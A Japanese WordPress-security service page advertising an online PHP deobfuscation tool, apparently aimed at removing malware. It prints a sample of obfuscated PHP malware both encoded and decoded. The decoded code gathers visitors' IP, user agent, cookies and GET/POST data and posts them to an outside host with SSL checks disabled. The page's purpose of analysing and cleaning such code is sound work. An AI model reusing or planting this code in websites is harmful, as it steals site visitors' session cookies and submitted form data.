Japanese English

PHP 難読化コードの復元・デコード

Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php goto boRJO; boRJO: $ch = curl_init(); goto fB1wY; jUCyr: curl_setopt($ch, CURLOPT_POST, TRUE); goto HcxAz; IKqv7: curl_close($ch); goto bi3Dv; HcxAz: curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); goto b2dAn; N9o8z: $d = array("\151" => serialize($_SERVER["\122\x45\115\117\x54\x45\x5f\x...



難読化されたPHPコード

<?php goto boRJO; boRJO: $ch = curl_init(); goto fB1wY; jUCyr: curl_setopt($ch, CURLOPT_POST, TRUE); goto HcxAz; IKqv7: curl_close($ch); goto bi3Dv; HcxAz: curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); goto b2dAn; N9o8z: $d = array("\151" => serialize($_SERVER["\122\x45\115\117\x54\x45\x5f\x41\x44\x44\122"]), "\x75" => serialize($_SERVER["\x48\124\124\120\137\x55\123\105\122\x5f\x41\107\105\116\124"]), "\x68" => serialize($_SERVER["\110\124\x54\x50\137\110\117\123\x54"]), "\x63" => serialize($_COOKIE), "\147" => serialize($_GET), "\160" => serialize($_POST)); goto nLmfD; H36HP: curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); goto N9o8z; bi3Dv: if (strpos($r, "\x47\111\106\70\71") !== false) { header("\x43\157\x6e\x74\145\x6e\164\55\124\x79\160\x65\x3a\x20\151\x6d\141\x67\x65\57\x67\x69\146"); echo $r; exit;} goto cmXKz; b2dAn: curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); goto H36HP; fB1wY: curl_setopt($ch, CURLOPT_URL, "\150\164\164\x70\163\x3a\x2f\57\x77\x77\x77\56\x69\x6e\x65\x72\x69\156\157\56\143\157\x2e\x7a\141\x2f\151\x6e\144\x65\x78\x2e\x70\x68\160"); goto jUCyr; LTTGw: $r = curl_exec($ch); goto IKqv7; nLmfD: curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($d)); goto LTTGw; cmXKz: ?>

デコード(難読化解除)されたコード

<?php

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://www.inerino.co.za/index.php");
curl_setopt($ch, CURLOPT_POST, TRUE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
$d = array("i" => serialize($_SERVER["REMOTE_ADDR"]), "u" => serialize($_SERVER["HTTP_USER_AGENT"]), "h" => serialize($_SERVER["HTTP_HOST"]), "c" => serialize($_COOKIE), "g" => serialize($_GET), "p" => serialize($_POST));
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($d));
$r = curl_exec($ch);
curl_close($ch);
if (strpos($r, "GIF89") !== false) {
    header("Content-Type: image/gif");
    echo $r;
    exit;
}

■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります

(C)2019 ワードプレス ドクター All rights reserved.